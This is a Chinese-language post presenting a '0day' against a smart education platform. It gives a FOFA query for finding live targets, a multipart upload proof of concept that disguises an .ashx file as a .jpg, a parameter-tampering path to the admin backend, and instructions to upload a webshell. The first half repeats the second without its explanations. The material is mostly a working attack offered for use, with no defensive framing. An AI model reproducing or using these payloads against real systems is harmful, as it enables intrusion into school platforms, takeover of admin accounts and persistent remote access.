# 智慧教育平台0day
==FOFA==
"/Widget/common/Service/CommonWidgetService.asmx/Categorylist"

/SmartMobile/micropage/UpLoad/FilesUpLoadHandler.ashx
===POC===
Post: ------WebKitFormBoundaryxJBEcLK1xdylqBhP Content-Disposition: form-data;name="fileType" 2222.ashx ------WebKitFormBoundaryxJBEcLK1xdylqBhP Content-Disposition: form-data;name="file"; filename="2222.jpg" Content-Type: image/jpeg 1 ------WebKitFormBoundaryxJBEcLK1xdylqBhP—
==未經授權訪問漏洞==
/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0
Module/SSO/SJS_Register.aspx
http://xxx.xxx.xxx/Module/PersonalCenter/Default.aspx?user=test123
user=admin
,發現界面發生變化,用戶變為管理員http://xxx.xxx.xxx/Module/PersonalCenter/Default.aspx?user=admin
http://xxx.xxx.xxx/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0
==Getshell==
==FOFA==
"/Widget/common/Service/CommonWidgetService.asmx/Categorylist"

/SmartMobile/micropage/UpLoad/FilesUpLoadHandler.ashx
使用該Payload後返回任意內容即漏洞存在。
===POC===
Post: ------WebKitFormBoundaryxJBEcLK1xdylqBhP Content-Disposition: form-data;name="fileType" 2222.ashx ------WebKitFormBoundaryxJBEcLK1xdylqBhP Content-Disposition: form-data;name="file"; filename="2222.jpg" Content-Type: image/jpeg 1 ------WebKitFormBoundaryxJBEcLK1xdylqBhP—
通過構造的POC成功上傳文件。
==未經授權訪問漏洞==
/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0
直接進入管理員後台,需要登錄的提示綁定賬號,這時候需要註冊一個賬號登錄。
Module/SSO/SJS_Register.aspx
註冊成功後,登錄到用戶主頁
http://xxx.xxx.xxx/Module/PersonalCenter/Default.aspx?user=test123
修改
user=admin
,發現界面發生變化,用戶變為管理員http://xxx.xxx.xxx/Module/PersonalCenter/Default.aspx?user=admin
進入管理員後台頁面
http://xxx.xxx.xxx/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0
==Getshell==
CMS圖片上傳沒有過濾,修改fileType並且上傳Webshell即可。
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容